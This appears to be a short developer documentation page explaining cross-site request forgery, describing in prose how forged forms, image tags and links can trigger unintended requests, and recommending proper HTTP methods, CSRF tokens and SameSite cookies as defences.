Cross-site request forgery (CSRF)

A CSRF attack is when a valid, but unintended, request is sent to the webserver. It usually happens when users are tricked into submitting requests they didn't intend to send.

An attacker could update a user's login information or interact with the application on the user's behalf.

Forms of attack

Forms

A popular attack vector is tricking users into submitting malicious forms. The attacker can host a malicious version of a website on their private server. The site will look like the original, but the attacker controls it.

Attackers can trick users onto the malicious website with phishing emails, a link submitted by the user in user-generated content, or another way.

The attacker mirrors the attributes and fields of the original form. But since the attacker controls the form, they can manipulate values.

The request will pass authentication checks if the user is logged into the original site using a session cookie, and the session cookie hasn't been protected.

Images

If the application has GET endpoints that update data on the server, an attack can be performed with an image. This applies only to websites where users can submit content.

The attacker can submit an HTML image tag with the vulnerable endpoint as the source. When the user browses the application and encounters the image, the browser will send the GET request. The request will pass authentication checks because the request is sent from the authenticated users browser.

Deceptive links

Links are vulnerable to CSRF attacks in the same way that images are. An attacker tricks a user into clicking on a link. The link contains a URL to the vulnerable endpoint.

Mitigating and preventing attacks

Use proper HTTP methods

Make sure to use the appropriate HTTP methods on endpoints. POST requests should create new resources. PUT and PATCH requests should update existing resources.

Using proper 'HTTP verbs' prevents attackers from using links or images to send requests that alter data.

CSRF Tokens

A CSRF token is a value that is included in the request using a hidden input field in a form.

It should be unique for the user and randomly generated so no one can guess it.

When requests are sent through a form, the server can validate that the token exists and is valid.

Same-Site cookies

Session-cookies used for authentication should use the SameSite attribute. Browsers only send SameSite cookies with requests if the cookie was created on the same domain.

Authentication scaffolding

Starter kits for Laravel, Vue and React.